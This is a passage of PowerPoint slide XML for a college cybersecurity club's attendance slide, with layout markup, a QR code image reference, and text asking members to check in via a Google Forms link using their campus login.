              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="872" name="Google Shape;872;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261354" y="4896612"/>
            <a:ext cx="2400300" cy="20574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9C0B4"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C9C0B4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>CofC Cybersecurity Club</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="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3D0000"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr/>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="411480"/>
            <a:ext cx="7772400" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rIns="0" tIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="4AD4C4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>ATTENDANCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="777240"/>
            <a:ext cx="5120640" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rIns="0" tIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Check in for tonight's meeting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1874519"/>
            <a:ext cx="5120640" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rIns="0" tIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Scan the QR code to sign in for attendance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Requires your CofC login.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3063240"/>
            <a:ext cx="5120640" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rIns="0" tIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="C9C0B4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Can't scan? Go to forms.gle/ccN4CuqviXhndixq5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4850892"/>
            <a:ext cx="5486400" cy="210312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rIns="0" tIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="800" b="0">
                <a:solidFill>
                  <a:srgbClr val="C9C0B4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>ATTENDANCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291072" y="4850892"/>
            <a:ext cx="2395728" cy="210312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rIns="0" tIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr sz="800" b="0">
                <a:solidFill>
                  <a:srgbClr val="C9C0B4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>CofC Cybersecurity Club</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="594360"/>
            <a:ext cx="2743200" cy="3246120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6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qr.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240780" y="795528"/>
            <a:ext cx="2148840" cy="2148840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="3054096"/>
            <a:ext cx="2743200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" rIns="0" tIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Scan to check in</a:t>
            </a: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